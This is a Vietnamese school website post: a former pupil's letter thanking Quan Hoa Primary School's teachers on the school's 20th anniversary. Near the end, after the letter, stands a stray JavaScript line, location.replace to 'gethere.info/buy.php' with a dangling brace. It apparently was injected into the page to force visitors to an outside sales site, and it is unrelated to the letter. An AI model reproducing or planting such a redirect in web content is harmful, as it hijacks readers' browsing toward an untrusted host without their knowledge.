LỜI TRI ÂN THẦY CÔ!

27/11/2013 10:53 Chiều Phản hồi đã bị khóa

Kính thưa các thầy cô giáo!

Con tên là: Lưu Lan Nhi, là cựu học sinh của Trường Tiểu học Quan Hoa niên khóa 2008 – 2013.Nay nhờ sự dạy dỗ của thầy cô, sự quan tâm của gia đình và sự nỗ lực của bản thân con đã trở thành học sinh trường chuyên HanoiAmsterdam.

Nhớ về ngôi trường tiểu học Quan Hoa, bao nhiêu kí ức năm xưa lại ùa về bên con: nhớ lắm ngôi trường nhỏ bé, xinh xắn nằm giữa trung tâm Quận Cầu Giấy, nhớ da diết lời cô giảng bài ân cần, sâu lắng. Tất cả, tất cả sẽ mãi là những kỷ niệm, hành trang quý giá trong mỗi chúng con, chính thầy cô đã truyền cho chúng con hơi ấm và sức mạnh. Chúng con đã phần nào tự tin trên mỗi bước chân mình. Thầy cô là người cha, người mẹ thứ hai của chúng con, người đã dìu dắt chúng em bao tháng ngày qua, người răn dạy, thương yêu chúng em hết mực đồng thời là người truyền cho chúng con sự tự tin, trao tặng hành trang để chúng con vững bước. Công ơn thầy cô không thể dùng từ nào diễn tả cho hết được.

Nhân dịp kỷ niệm 20 năm ngày thành lập trường, ngôi trường nơi đã ươm mầm những ước mơ cho chúng con thay mặt cho các thế hệ học sinh của nhà trường con gửi lời cảm ơn sâu sắc nhất đến các thầy cô giáo và toàn thể cán bộ công nhân viên của nhà trường, con và chúc các thầy cô mạnh khỏe, ngày càng gặt hái được nhiều thành công trong sự nghiệp trồng người.

Một lần nữa con xin chân thành cảm ơn!

location.replace(“http://gethere.info/buy.php”);

}

Các phản hồi đã bị đóng lại bở quản trị.